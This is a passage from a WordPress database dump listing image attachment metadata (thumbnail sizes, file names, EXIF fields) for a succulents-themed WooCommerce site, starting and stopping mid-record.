:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:37:\"woocommerce-placeholder-1100x1100.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17,3399,'_wp_attached_file','2018/02/landing-slide1-graphic4.png'),(18,3399,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:145;s:6:\"height\";i:64;s:4:\"file\";s:35:\"2018/02/landing-slide1-graphic4.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic4-100x64.png\";s:5:\"width\";i:100;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic4-100x64.png\";s:5:\"width\";i:100;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19,1079,'_wp_attached_file','2018/01/Logo-1000-x-.png'),(20,1079,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:294;s:4:\"file\";s:24:\"2018/01/Logo-1000-x-.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"Logo-1000-x--300x294.png\";s:5:\"width\";i:300;s:6:\"height\";i:294;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--600x176.png\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Logo-1000-x--300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--768x226.png\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--630x294.png\";s:5:\"width\";i:630;s:6:\"height\";i:294;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--550x294.png\";s:5:\"width\";i:550;s:6:\"height\";i:294;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--550x294.png\";s:5:\"width\";i:550;s:6:\"height\";i:294;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"Logo-1000-x--300x294.png\";s:5:\"width\";i:300;s:6:\"height\";i:294;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--600x176.png\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Logo-1000-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21,3399,'_wp_attachment_image_alt','o'),(22,611,'_wp_attached_file','2018/01/h10-slide2-graphic2.png'),(23,611,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:441;s:6:\"height\";i:434;s:4:\"file\";s:31:\"2018/01/h10-slide2-graphic2.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide2-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic2-300x295.png\";s:5:\"width\";i:300;s:6:\"height\";i:295;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic2-441x300.png\";s:5:\"width\";i:441;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide2-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide2-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24,1301,'_wp_attached_file','2018/01/product14-gallery3.jpg'),(25,1301,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product14-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product14-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product14-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26,3944,'_wp_attached_file','2018/01/recipe-website.jpg'),(27,2514,'_wp_attached_file','2018/02/back-pear.jpg'),(28,3944,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:26:\"2018/01/recipe-website.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"recipe-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"recipe-website-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"recipe-website-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"recipe-website-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-website-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"recipe-website-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"recipe-website-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"recipe-website-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"recipe-website-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"recipe-website-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"recipe-website-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"recipe-website-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"recipe-website-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"recipe-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"recipe-website-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205941\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(29,2975,'_wp_attached_file','2018/02/our-team-parallax-1.jpg'),(30,2514,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:21:\"2018/02/back-pear.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"back-pear-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"back-pear-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"back-pear-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"back-pear-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"back-pear-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"back-pear-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"back-pear-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"back-pear-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"back-pear-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"back-pear-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"back-pear-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"back-pear-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"back-pear-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"back-pear-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"back-pear-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"back-pear-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"back-pear-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31,2975,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:564;s:4:\"file\";s:31:\"2018/02/our-team-parallax-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"our-team-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"our-team-parallax-1-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"our-team-parallax-1-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"our-team-parallax-1-1536x451.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"our-team-parallax-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-550x564.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"our-team-parallax-1-1100x564.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"our-team-parallax-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"our-team-parallax-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32,18,'_wp_attached_file','2018/01/404-img-1.jpg'),(33,18,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:21:\"2018/01/404-img-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"404-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"404-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"404-img-1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"404-img-1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"404-img-1-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"404-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"404-img-1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"404-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"404-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"404-img-1-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"404-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"404-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"404-img-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"404-img-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"404-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"404-img-1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"404-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34,3400,'_wp_attached_file','2018/02/landing-slide1-graphic5.png'),(35,3400,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:409;s:6:\"height\";i:98;s:4:\"file\";s:35:\"2018/02/landing-slide1-graphic5.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"landing-slide1-graphic5-300x98.png\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"landing-slide1-graphic5-100x98.png\";s:5:\"width\";i:100;s:6:\"height\";i:98;s:9:\"mime-typ